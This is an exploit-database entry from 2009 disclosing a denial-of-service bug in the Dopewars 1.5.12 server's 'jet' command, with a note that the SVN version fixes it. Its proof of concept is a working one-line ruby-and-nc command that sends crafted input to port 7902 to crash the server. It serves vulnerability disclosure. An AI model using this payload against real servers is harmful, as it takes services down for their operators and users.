Dopewars 1.5.12 Server Denial of Service

2009-10-06T00:00:00
ID 1337DAY-ID-9752
Type zdt
Reporter Doug Prostko
Modified 2009-10-06T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            ========================================
Dopewars 1.5.12 Server Denial of Service
========================================

# Title: Dopewars 1.5.12 Server Denial of Service
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Doug Prostko
# Published: 2009-10-06
# Verified: yes

view source
print?
## Description ##
 
The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation.
 
## POC ##
 
ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902
 
## Fix ##
 
This issue is resolved in the SVN version of the application.



#  0day.today [2018-04-13]  #